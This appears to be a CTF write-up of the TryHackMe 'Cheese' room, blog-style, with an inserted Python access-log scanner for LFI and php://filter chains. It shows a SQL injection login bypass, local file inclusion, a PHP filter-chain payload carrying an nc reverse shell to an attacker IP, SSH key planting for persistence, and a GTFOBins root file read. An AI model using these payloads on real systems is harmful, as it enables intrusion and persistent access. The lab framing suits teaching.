Cheese CTF TryHackMe Walkthrough

Jzboss3
3 min read · Sep 29, 2024


Ready? Set! Go!

Using an nmap scan, we found port 80 open, indicating a web page hosted on that port.

Let’s visit it.

We have a login page! Let’s try to brute-force it.

Using the following payload in the username field, I managed to log in to the website.

' || 1=1; -- -

Enter anything in the password field.

By intercepting the request, I noticed the page is loaded through “/secret-script.php?file=supersecretadminpanel.html”.

I replaced “supersecretadminpanel.html” with “/etc/passwd” and got its content, confirming a local file inclusion (LFI)!

Now. Let’s try to convert this LFI into RCE.

I am going to follow the steps described here.

First, we need to create the payload using php_filter_chain_generator.py

python3 php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.6.62.127 1234 >/tmp/f"); ?>' | grep '^php' > rev.txt

Now, let’s send this payload to the website as the “file” parameter and get a reverse shell as www-data.

curl -s "http://cheese.thm/secret-script.php?file=$(cat rev.txt)" 
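As an added example (not part of the original walkthrough), here is a small Python check a defender could run over web-server access logs to spot the two requests above: a “file” parameter pointing at an absolute path or traversal sequence, and a php://filter wrapper chain used to smuggle code through the include. The log lines are constructed samples in Apache combined format; only the host, script name and parameter name come from the page.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache combined format). The second and
# third mirror the walkthrough's LFI and filter-chain requests; the first is benign.
SAMPLE_LOG = """\
10.6.62.127 - - [29/Sep/2024:10:00:01 +0000] "GET /secret-script.php?file=supersecretadminpanel.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.6.62.127 - - [29/Sep/2024:10:00:02 +0000] "GET /secret-script.php?file=/etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.6.62.127 - - [29/Sep/2024:10:00:03 +0000] "GET /secret-script.php?file=php://filter/convert.iconv.UTF8.CSUTF7|convert.base64-decode/resource=php://temp HTTP/1.1" 200 0 "-" "curl/8.0"
"""

# Pull the request line ("GET /path?query HTTP/1.1") out of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_file_param(value: str) -> list[str]:
    """Return indicator names for a (URL-decoded) value of the 'file' parameter."""
    findings = []
    # Absolute paths and traversal sequences reach outside the intended directory.
    if value.startswith("/") or "../" in value or "..\\" in value:
        findings.append("path-traversal-or-absolute-path")
    # Any stream wrapper (php://, data:, etc.) means the include is no longer a plain file.
    if re.match(r"^[a-z0-9.+-]+://", value, re.I):
        findings.append("stream-wrapper")
    # Filter chains built from iconv conversions ending in a base64-decode are the
    # signature of generated php://filter payloads.
    if "convert.iconv" in value or "convert.base64-decode" in value:
        findings.append("php-filter-chain")
    return findings


def scan_access_log(text: str) -> list[dict]:
    """Scan log text and return one alert per suspicious request to secret-script.php."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        if not url.path.endswith("secret-script.php"):
            continue
        # parse_qs already URL-decodes the value and keeps everything after the first '='.
        for value in parse_qs(url.query).get("file", []):
            findings = classify_file_param(value)
            if findings:
                alerts.append({"line": lineno, "file": value, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```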

Let’s stabilize it!

python3 -c "import pty;pty.spawn('/bin/bash')"

export TERM=xterm

🤔🤔🤔…

Searching through the files and directories, I found an interesting file: “/home/comte/.ssh/authorized_keys”.

To get a shell as comte, we can simply add an SSH key to the file.

First, generate a key on your machine:

ssh-keygen -f id_ed25519 -t ed25519

Press Enter without entering a passphrase.

cat id_ed25519.pub

Copy the file’s content and paste it into “authorized_keys”.

To get a shell, enter the following on your machine:

ssh -i id_ed25519 comte@cheese.thm
cat user.txt

We got our first flag!!

Time to get root!

We can write to the “exploit.timer” file (a systemd timer unit)!

After running it, we can see that it created a binary file in /opt.

Using GTFOBins, we found a way to read root’s flag:

./xxd "/root/root.txt" | xxd -r

Hope you enjoyed it!

Happy Hacking!
